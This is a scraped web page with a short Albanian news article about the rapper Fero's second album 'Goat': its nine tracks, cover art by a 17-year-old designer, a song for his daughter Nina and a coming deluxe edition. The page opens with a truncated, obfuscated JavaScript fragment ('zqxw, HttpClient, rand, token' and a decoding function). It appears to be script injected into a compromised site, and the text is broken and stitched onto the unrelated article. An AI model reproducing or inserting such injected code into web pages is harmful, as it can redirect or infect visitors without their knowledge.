;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Të pazbuluarat e albumit të ri të Feros, nga koncepti tek surpriza e madhe!

By

Ashtu siç kishte paralajmëruar, Fero ka publikuar albumin “Goat”.

Albumi përbëhet gjithsejt nga nëntë këngë, të cilat janë të disponueshme në platformën Spotify.

“Goat” është albumi i dytë në karrierë i Feros.  Një prej pjesëve që ka marrë vëmendje është aspekti vizual i ballinës, për të cilën reperi ka bashkëpunuar me dizajnerin Ron Fetahu, i njohur si “Ron the designer”, i cili është vetëm 17 vjeç.

Ballina përfshin fotografi të marra nga rrugëtimi i reperit prej moshës 2 vjeçare në të cilat është i vulosur pasioni për muzikën, për të vazhduar me adoleshencën dhe pjesën e familjes, mes tjerash edhe shkaku i vajzës Nina, të cilës ia ka dedikuar një këngë me titull emrin e saj.

“Gjiro” është njëra prej këngëve të albumit, e cila është realizuar me videoklip dhe është publikuar në Youtube.

Ndërkaq, mësohet se pas një periudhe afro një mujore, del pjesa “deluxe” e albumit, risi kjo e pa dëgjuar më herët ku do vijnë edhe 11 këngë të tjera të tjera. /Prive.al

Artikuj të ngjashëm